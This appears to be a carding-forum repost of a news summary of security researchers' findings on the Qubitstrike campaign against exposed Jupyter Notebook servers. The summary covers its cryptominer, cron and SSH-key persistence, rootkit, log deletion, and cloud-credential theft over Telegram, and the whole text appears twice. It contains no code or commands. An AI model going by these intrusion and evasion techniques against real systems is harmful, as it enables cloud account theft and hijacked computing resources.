Carding 4 Carders
Professional
The new campaign shows the ability of hackers to hide and gain control over the system.
Security researchers from the information security company Cado Security discovered a new cyber threat originating, presumably, from Tunisia. The goal of the campaign, called Qubitstrike, is to attack vulnerable instances of Jupyter Notebook for mining cryptocurrency and hacking cloud environments.
The main attack tool involves using the Telegram API to export Jupyter Notebooks credentials after a successful hack. All malicious files for the Qubitstrike campaign are hosted on the platform codeberg.org, an alternative to GitHub.
Technical analysis showed that after hacking public Jupyter instances, attackers execute commands to extract the shell script (mi.sh) with Codeberg. The script is responsible for launching the cryptocurrency miner, establishing a permanent connection via a Cron task, adding the attacker's SSH key to the ". ssh/authorized_keys" file for remote access, and distributing malware to other hosts via SSH.
The malware also installs the Diamorphine rootkit to hide malicious processes and transmit captured Amazon Web Services (AWS) and Google Cloud credentials via the Telegram API.
One notable aspect of the attack is the renaming of legitimate data transfer utilities, such as curl and wget. This is probably done to avoid detection and restrict other users access to the tools.
The script mi.sh it also iterates through the specified list of process names, terminating the processes of other miners that may have previously compromised the system. The campaign also includes using the netstat command to terminate network connections to IP addresses previously associated with cryptojacking campaigns. Attackers also delete various Linux log files to remain undetected.
The exact origin of the threat is unclear, but the IP address used to log in to the cloud-based honeypot with the stolen credentials points to Tunisia.
A study of the Codeberg repository also revealed a Python implant (kdfs.py), which is deployed on infected hosts with Discord as a command and control mechanism (Command and Control, C2). Communication between the script mi.sh and a Python implant kdfs.py it is not yet known, but it is assumed that the implant is intended for deploying a shell script.
Qubitstrike is a relatively sophisticated malware distribution campaign with a particular focus on exploiting cloud services. The ultimate goal of Qubitstrike, as experts have suggested, is to capture resources for mining the XMRig cryptocurrency. However, an analysis of the C2 infrastructure of Discord shows that, in fact, after gaining access to vulnerable hosts, operators can carry out any possible attack.
Security researchers from the information security company Cado Security discovered a new cyber threat originating, presumably, from Tunisia. The goal of the campaign, called Qubitstrike, is to attack vulnerable instances of Jupyter Notebook for mining cryptocurrency and hacking cloud environments.
The main attack tool involves using the Telegram API to export Jupyter Notebooks credentials after a successful hack. All malicious files for the Qubitstrike campaign are hosted on the platform codeberg.org, an alternative to GitHub.
Technical analysis showed that after hacking public Jupyter instances, attackers execute commands to extract the shell script (mi.sh) with Codeberg. The script is responsible for launching the cryptocurrency miner, establishing a permanent connection via a Cron task, adding the attacker's SSH key to the ". ssh/authorized_keys" file for remote access, and distributing malware to other hosts via SSH.
The malware also installs the Diamorphine rootkit to hide malicious processes and transmit captured Amazon Web Services (AWS) and Google Cloud credentials via the Telegram API.
One notable aspect of the attack is the renaming of legitimate data transfer utilities, such as curl and wget. This is probably done to avoid detection and restrict other users access to the tools.
The script mi.sh it also iterates through the specified list of process names, terminating the processes of other miners that may have previously compromised the system. The campaign also includes using the netstat command to terminate network connections to IP addresses previously associated with cryptojacking campaigns. Attackers also delete various Linux log files to remain undetected.
The exact origin of the threat is unclear, but the IP address used to log in to the cloud-based honeypot with the stolen credentials points to Tunisia.
A study of the Codeberg repository also revealed a Python implant (kdfs.py), which is deployed on infected hosts with Discord as a command and control mechanism (Command and Control, C2). Communication between the script mi.sh and a Python implant kdfs.py it is not yet known, but it is assumed that the implant is intended for deploying a shell script.
Qubitstrike is a relatively sophisticated malware distribution campaign with a particular focus on exploiting cloud services. The ultimate goal of Qubitstrike, as experts have suggested, is to capture resources for mining the XMRig cryptocurrency. However, an analysis of the C2 infrastructure of Discord shows that, in fact, after gaining access to vulnerable hosts, operators can carry out any possible attack.
